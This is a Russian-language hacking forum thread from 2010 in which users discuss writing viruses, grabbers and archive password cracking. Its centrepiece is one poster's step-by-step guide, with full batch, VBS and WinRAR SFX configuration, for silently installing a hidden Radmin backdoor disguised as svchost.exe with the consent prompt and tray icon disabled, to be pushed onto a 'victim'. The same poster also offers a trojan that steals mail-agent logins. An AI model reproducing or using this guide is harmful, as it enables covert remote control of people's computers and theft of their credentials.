Вирусняшки и Полезность
MoRoZko
15 сен 2010
В тебе обсудим:
кто чем страдал, что дошел до этого)
кто какую пакасть писал, у кого что работает что неработает)
если нужна помошь по вирусописанию или просто программописанию пишем суда поможем чем сможем как говориться)
Кто хочет пример может не читать
Как пример:
Я сам просто страдал тем чем страдает 90% свободново времени мужыки, да плюс агент "недоброжелателя хотел сильно узнать". Пакостей писал много и много ещё напишу, написать то можно всё просто фантазии не набираеться, помошь собственно мне тоже требуеться, ток в идеях, призываю народ на выложение всяких идей "умных" вирусов, программ от которых польза есть...
Пишу беспалевные умные вирусы, например Скрытый радмин который уже всеми антивирями палиться переписал под беспалевного, всякие разные грабберы(для тех кто незнает: пришёл всунул флешку, ушёл и чуть ли ни все пороли которые есть на компе с собой унёс на ней же, ток их увидишь токо ты), ну или "почти" грабберы, запустил "обычную" программку, а пороли ко мне на почту пришли, из полезностей писал сортировку файлов (музыку в папку музыку, картинки в папку картинки и т.д.) таймеры всякие, будильники)))) думаю многи люди заинтересуються... Сразу говорю "чистые вирусы" скидывать небуду, пишем сами я просто помогать буду хотя может и договоримся)))
Тему создаю только для того чтобы "хакеров самоучек, начинающих" ну и естественно "начинающих мелко программописателей" с ног поднять, поучить чемунить)
зы: сам хакером неявляюсь, поролей куча чужых на компе, но непользуюсь) я добрый)
незабываем также пишем полезные программы они на ровне идут по сложности)
Сообщение отредактировал MoRoZko: 15 Сентябрь 2010 - 20:14
MoRoZko
15 сен 2010
master_of_puppet (15.09.2010, 20:17) писал:
сорцы в студию.
зы: кстате читы даже непросите небуду, нехочу и помогать с ними небуду)
MoRoZko
15 сен 2010
master_of_puppet (15.09.2010, 20:29) писал:
если в этой теме будут только понты, тогда от нее пользы 0.
говорю вы мне идеи дайте я их в жизнь плавненько переведу) как наберёться поболее выложу)
у кого есть какие идеи???
Victor.Z
02 окт 2010
MoRoZko (15.09.2010, 20:42) писал:
да нафиг понты просто я по сообственному опыту знаю) пишишь чото неработает и начинешь по инету искать, проще то спросить чо в скрипте неработает, выложить то что сделал) лично я исправлю чем смогу помогу. а полезные программы выкладывать буду.
говорю вы мне идеи дайте я их в жизнь плавненько переведу) как наберёться поболее выложу)
у кого есть какие идеи???
говорю вы мне идеи дайте я их в жизнь плавненько переведу) как наберёться поболее выложу)
у кого есть какие идеи???
yonga
02 окт 2010
Victor.Z (2.10.2010, 12:31) писал:
Часто с Инета скачиваешь какую-нибудь прогу, она в Rar-овской папке, а начинаешь разархивировать, они сволочи просят SMS-ку отправить, для получения кода (естественно не бесплатно). Можно какой-нибудь программулинкой этот пароль взломать? Потому-что неизвестно сколько здерут за SMS-ку и не факт что пароль пришлют.
зависит от сложности пароля
DenisMitchell
05 окт 2010
Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...
paranoid
05 окт 2010
DenisMitchell (5.10.2010, 04:47) писал:
Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...
DenisMitchell
05 окт 2010
Уже разобрался со своей проблемой! Нужно было прогнать через отладчик один странно ведущий себя файл, как выяснилось это оказался кейлогер. Просто не мог понять куда отчёты летят, вопрос решился на раз два, просто отснифал все пакеты у себя и всё 
MoRoZko
10 окт 2010
У вентуры появился вопрос на счёт скрытого радмина сейчас всё популярно всем обьясню
в инете вы рабочий врядтли найдёте так как файл регистра палиться антивирями, ну почти всеми
исправляем этот недуг вместо обычного reg.reg файла забиваем струкнуру его в бат файл откуда и видёться сама установка радмина
приблезительно вот так будет выглядеть:
терь обьяснение к веткам:
Parameter - пороль на радмин хоть он и храниться в зашифрованом виде я "трулулу" вставил
Port - на какой порт будет ставиться тоже трулулу вместо хэша
менять выше перечисленые параметры трудоёмко т.к. они зашифрованы
далее просто, но немение важно:
AskUser - спраишвать у юсера при конекте, т.к. радмин скрытый ставим неспрашивать
DisableTrayIcon - показывать иконку в трее, тоже нет
далее в батнике пишем куды будем копировать сорцы самого радмина, а иммено:
AdmDll.dll
raddrv.dll
svchost.exe зы: может называться как угодно у меня так
копируем это всё командой типо copy /y в %SYSTEMROOT%/help\
пример:
терь непосредственно устанавливаем сам радмин из уже всего готовенького:
и запускаем
он сам прописываеться на автозагрузку, причём административную и обычному пользователю невидно
ещё нам нужен vbs скрипт для чего узнаете попойже
vbs:
кстате наш_радмин.bat может быть и exe файлом, нужно всеголишь компилятор... и окошко батника мигать не будет перед глазами когда установка будет проходить
Впринцыпе разобрались с радмином терь как из 4х файлов сделать один, а очень легко)))
для этого нам потребуеться обычный архиватор WinRar который у всех есть надеюсь...
выбераем файлы и прописываем в коментарии что то в роде:
переменые
Path - куды сейвим
Setup - что запускаем после распоковки, т.к. запуск bat файлов из архива заприщенно системой безопасности microsoft, пользуемся vbs который уже будет запускать bat файл ну или exe
Silent - не выдовать окон
Overwrite - перезаписывать все файлы без запроса
в исходе получаем 1 самораспоковывающийся архив с любым значком который нам понравиться, и при его запуске не будет происходить нечего, как будто нерабочий файл, ну или бат окошко мигать будет...(пользуйтесь компилятором!!!)
всё что осталось либо замоскировать его какнибуть и скинуть шобы скачали запустили
либо же тупо пихнуть его жертве
зы: работает токо при открытых портах, на инет у нас без hamachi или какойнить проги на подобе работать небудет! а у нас через vpn пользуйтесь скоко влезет!
в итоге у нас получаеться:
кому помог или просто понравилось))) НЕ ЗАБЫВАЙТЕ ТЫКАТЬ СПАСИБО!!!
Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:13
в инете вы рабочий врядтли найдёте так как файл регистра палиться антивирями, ну почти всеми
исправляем этот недуг вместо обычного reg.reg файла забиваем струкнуру его в бат файл откуда и видёться сама установка радмина
приблезительно вот так будет выглядеть:
Цитата
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f
терь обьяснение к веткам:
Parameter - пороль на радмин хоть он и храниться в зашифрованом виде я "трулулу" вставил
Port - на какой порт будет ставиться тоже трулулу вместо хэша
менять выше перечисленые параметры трудоёмко т.к. они зашифрованы
далее просто, но немение важно:
AskUser - спраишвать у юсера при конекте, т.к. радмин скрытый ставим неспрашивать
DisableTrayIcon - показывать иконку в трее, тоже нет
далее в батнике пишем куды будем копировать сорцы самого радмина, а иммено:
AdmDll.dll
raddrv.dll
svchost.exe зы: может называться как угодно у меня так
копируем это всё командой типо copy /y в %SYSTEMROOT%/help\
пример:
Цитата
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
терь непосредственно устанавливаем сам радмин из уже всего готовенького:
Цитата
"%SYSTEMROOT%/help\svchost.exe" /install /silence
Цитата
"%SYSTEMROOT%/help\svchost.exe" /start
ещё нам нужен vbs скрипт для чего узнаете попойже
vbs:
Цитата
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ("наш_радмин.bat")
WshShell.Run ("наш_радмин.bat")
Впринцыпе разобрались с радмином терь как из 4х файлов сделать один, а очень легко)))
для этого нам потребуеться обычный архиватор WinRar который у всех есть надеюсь...
выбераем файлы и прописываем в коментарии что то в роде:
Цитата
Path=xak\
SavePath
Setup=st.vbs
Silent=1
Overwrite=1
SavePath
Setup=st.vbs
Silent=1
Overwrite=1
Path - куды сейвим
Setup - что запускаем после распоковки, т.к. запуск bat файлов из архива заприщенно системой безопасности microsoft, пользуемся vbs который уже будет запускать bat файл ну или exe
Silent - не выдовать окон
Overwrite - перезаписывать все файлы без запроса
в исходе получаем 1 самораспоковывающийся архив с любым значком который нам понравиться, и при его запуске не будет происходить нечего, как будто нерабочий файл, ну или бат окошко мигать будет...(пользуйтесь компилятором!!!)
всё что осталось либо замоскировать его какнибуть и скинуть шобы скачали запустили
либо же тупо пихнуть его жертве
зы: работает токо при открытых портах, на инет у нас без hamachi или какойнить проги на подобе работать небудет! а у нас через vpn пользуйтесь скоко влезет!
в итоге у нас получаеться:
Цитата
@echo on
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
"%SYSTEMROOT%/help\svchost.exe" /install /silence
"%SYSTEMROOT%/help\svchost.exe" /start
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
"%SYSTEMROOT%/help\svchost.exe" /install /silence
"%SYSTEMROOT%/help\svchost.exe" /start
кому помог или просто понравилось))) НЕ ЗАБЫВАЙТЕ ТЫКАТЬ СПАСИБО!!!
Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:13
MoRoZko
10 окт 2010
Victor.Z (2.10.2010, 14:31) писал:
Часто с Инета скачиваешь какую-нибудь прогу, она в Rar-овской папке, а начинаешь разархивировать, они сволочи просят SMS-ку отправить, для получения кода (естественно не бесплатно). Можно какой-нибудь программулинкой этот пароль взломать? Потому-что неизвестно сколько здерут за SMS-ку и не факт что пароль пришлют.
Ventura (2.10.2010, 14:36) писал:
взломать можно , токо это долго и не эффективно
зависит от сложности пароля
зависит от сложности пароля
или алгоритм влома ищи в гугле) если найдёшь на взлом самого архива уйдёт не больше 5ти минут
и ещё как вариант, с какого сайта качаешь такой и пороль...
допустим на antichatе на все архивы пороль antichat или antichat.ru
DenisMitchell (5.10.2010, 05:47) писал:
Мой совет просто нужно скачать файл по другой ссылке.. когда требуют пароль для разархивации файла, это значит что файл был запакован через какуето партнёрскую программу.. На этом люди делают деньги и неплохие..
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...
По поводу самой темы имеется вопрос: Есть ли на форуме человек который разбирается в системном и низкоуровневом программировании? Есть несколько вопросов...
я в программировании шарю болемение обращайся
Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:23
MoRoZko
10 окт 2010
счас пойду погуляю и напишу взлом майл агента, тип троя, ток сорцы выкладывать небуду просто напишу чо откуда взять и как это потом ипользовать)))
зы: кому надо пишите ПМ скину вирь, вы его торжественно вручите жертве под какимнить предлогом а потом я вам скинун логин пасс уже с моей почты вам в личку)))
Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:21
зы: кому надо пишите ПМ скину вирь, вы его торжественно вручите жертве под какимнить предлогом а потом я вам скинун логин пасс уже с моей почты вам в личку)))
Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:21
PARADOX
10 окт 2010
MoRoZko (10.10.2010, 19:20) писал:
зы: кому надо пишите ПМ скину вирь, вы его торжественно вручите жертве под какимнить предлогом а потом я вам скинун логин пасс уже с моей почты вам в личку)))
Да зачем писать тебе, давай лучше встретимся и ты сам при встрече все расскажешь.
Я тебе писал, ты не ответил.
